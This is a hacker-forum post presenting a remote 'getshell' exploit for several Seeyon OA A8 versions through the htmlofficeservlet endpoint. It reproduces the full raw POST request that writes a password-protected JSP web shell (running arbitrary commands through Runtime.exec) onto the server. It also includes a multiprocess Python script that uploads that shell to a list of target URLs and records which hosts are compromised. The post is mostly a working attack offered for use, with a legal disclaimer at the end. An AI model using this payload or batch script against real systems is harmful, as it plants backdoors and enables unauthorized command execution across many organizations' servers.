Jump to content
This Wind

致远OA系统多版本Getshell – 附批量检测Poc

Recommended Posts

漏洞影响产品版本:

  • 致远A8-V5协同管理软件 V6.1sp1
  • 致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3
  • 致远A8+协同管理软件V7.1

漏洞情况:

访问/seeyon/htmlofficeservlet出现DBSTEP V3.0 0 21 0 htmoffice operate err”

POST包:

 
POST /seeyon/htmlofficeservlet HTTP/1.1
 
Content-Length: 1121
 
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
 
Host: xxxxxxxxx
 
Pragma: no-cache
 
DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV
 
OPTION=S3WYOSWLBSGr
 
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
 
CREATEDATE=wUghPB3szB3Xwg66
 
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
 
originalFileId=wV66
 
originalCreateDate=wUghPB3szB3Xwg66
 
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
 
needReadFile=yRWZdAS6
 
originalCreateDate=wLSGP4oEzLKAz4=iz=66
 
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce

响应包:

 
DBSTEP V3.0 386 0 666 DBSTEP=OKMLlKlV
 
OPTION=S3WYOSWLBSGr
 
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
 
CREATEDATE=wUghPB3szB3Xwg66
 
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
 
originalFileId=wV66
 
originalCreateDate=wUghPB3szB3Xwg66
 
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
 
needReadFile=yRWZdAS6
 
originalCreateDate=wLSGP4oEzLKAz4=iz=66
 
CLIENTIP=wLCXqUKAP7uhw4g5zi=6
 
 
 
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>
 
致远OA系统多版本Getshell – 附批量检测Poc-Ti0s's Blog
致远OA系统多版本Getshell – 附批量检测Poc-Ti0s's Blog

批量检测 (Python)

 

# Wednesday, 26 June 2019

# Author:nianhua

# Blog:https://github.com/nian-hua/



import re

import requests

import base64

from multiprocessing import Pool, Manager



def send_payload(url):

headers = {'Content-Type': 'application/x-www-form-urlencoded'}

payload = "REJTVEVQIFYzLjAgICAgIDM1NSAgICAgICAgICAgICAwICAgICAgICAgICAgICAgNjY2ICAgICAgICAgICAgIERCU1RFUD1PS01MbEtsVg0KT1BUSU9OPVMzV1lPU1dMQlNHcg0KY3VycmVudFVzZXJJZD16VUNUd2lnc3ppQ0FQTGVzdzRnc3c0b0V3VjY2DQpDUkVBVEVEQVRFPXdVZ2hQQjNzekIzWHdnNjYNClJFQ09SRElEPXFMU0d3NFNYekxlR3c0VjN3VXczelVvWHdpZDYNCm9yaWdpbmFsRmlsZUlkPXdWNjYNCm9yaWdpbmFsQ3JlYXRlRGF0ZT13VWdoUEIzc3pCM1h3ZzY2DQpGSUxFTkFNRT1xZlRkcWZUZHFmVGRWYXhKZUFKUUJSbDNkRXhReVlPZE5BbGZlYXhzZEdoaXlZbFRjQVRkTjFsaU40S1h3aVZHemZUMmRFZzYNCm5lZWRSZWFkRmlsZT15UldaZEFTNg0Kb3JpZ2luYWxDcmVhdGVEYXRlPXdMU0dQNG9FekxLQXo0PWl6PTY2DQo8JUAgcGFnZSBsYW5ndWFnZT0iamF2YSIgaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLioiIHBhZ2VFbmNvZGluZz0iVVRGLTgiJT48JSFwdWJsaWMgc3RhdGljIFN0cmluZyBleGN1dGVDbWQoU3RyaW5nIGMpIHtTdHJpbmdCdWlsZGVyIGxpbmUgPSBuZXcgU3RyaW5nQnVpbGRlcigpO3RyeSB7UHJvY2VzcyBwcm8gPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGMpO0J1ZmZlcmVkUmVhZGVyIGJ1ZiA9IG5ldyBCdWZmZXJlZFJlYWRlcihuZXcgSW5wdXRTdHJlYW1SZWFkZXIocHJvLmdldElucHV0U3RyZWFtKCkpKTtTdHJpbmcgdGVtcCA9IG51bGw7d2hpbGUgKCh0ZW1wID0gYnVmLnJlYWRMaW5lKCkpICE9IG51bGwpIHtsaW5lLmFwcGVuZCh0ZW1wKyJcbiIpO31idWYuY2xvc2UoKTt9IGNhdGNoIChFeGNlcHRpb24gZSkge2xpbmUuYXBwZW5kKGUuZ2V0TWVzc2FnZSgpKTt9cmV0dXJuIGxpbmUudG9TdHJpbmcoKTt9ICU+PCVpZigiYXNhc2QzMzQ0NSIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2QiKSkmJiEiIi5lcXVhbHMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSl7b3V0LnByaW50bG4oIjxwcmU+IitleGN1dGVDbWQocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSArICI8L3ByZT4iKTt9ZWxzZXtvdXQucHJpbnRsbigiOi0pIik7fSU+NmU0ZjA0NWQ0Yjg1MDZiZjQ5MmFkYTdlMzM5MGQ3Y2U="

payload = base64.b64decode(payload)

try:

r = requests.post(url + '/seeyon/htmlofficeservlet', data=payload)

r = requests.get(

url + '/seeyon/test123456.jsp?pwd=asasd3344&cmd=cmd%20+/c+echo+wangming')

if "wangming" in r.text:

return 0

else:

return url

except:

return 0



def remove_control_chars(s):

control_chars = ''.join(map(unichr, range(0,32) + range(127,160)))

control_char_re = re.compile('[%s]' % re.escape(control_chars))

s = control_char_re.sub('', s)

if 'http' not in s:

s = 'http://' + s

return s

def savePeopleInformation(url, queue):

newurl = send_payload(url)

if newurl != 0:

fw = open('loophole.txt', 'a')

fw.write(newurl + '\n')

fw.close()

queue.put(url)

def main():

pool = Pool(10)

queue = Manager().Queue()

fr = open('url.txt', 'r')

lines = fr.readlines()

for i in lines:

url = remove_control_chars(i)

pool.apply_async(savePeopleInformation, args=(url, queue,))

allnum = len(lines)

num = 0

while True:

print queue.get()

num += 1

if num >= allnum:

fr.close()

break

main()
 
Link to post
Share on other sites

Follow: 世界中文黑客论坛由CNHACKTEAM[CHT]创建,汇集国内外技术人员,这是一群研究网安黑客攻防技术领域的专家.

法务要求丨Legal丨закон丨القانون

请在学习期间遵守所在国家相关法律,否则后果自负!

Пожалуйста, соблюдайте законы страны, в которой вы находитесь, во время обучения, или будут последствия!

勉強期間中に該当する国の法律を守ってください。そうでなければ結果は自己責任です。

Please abide by the relevant laws of your country during your study, or you will be responsible for the consequences!

官方旗下项目丨About our project

声明:为净化国内外网络安全请勿发布违反国家国定的文章,团队不参与任何涉及黑色产业/攻击/渗透各国正规网站活动,只做网络安全研究,研究网络攻防技术。

世界中文黑客论坛由CNHACKTEAM(CHT)创建,汇集国内外技术人员,这是一群研究网络安全、黑客攻防技术领域的专家,你也可以加入我们!

黑客攻防  技术问答  0day  Hack News  CHT Team  使用指南  商城/Mall  商城订单查询  捐赠/donations  在线用户  X  联系邮箱email:[email protected]

友情链接丨Link丨Связь дружбы

CNHACKTEAM   CHT team official website     www.hac-ker.com     hacked.com.cn     www.77169.net     www.ddosi.com

申请或请未补上链接者联系我们的邮箱,谢谢!

×
×
  • Create New...

Important Information

Please use your computer to visit our website; Please agree to our website rules!Guidelines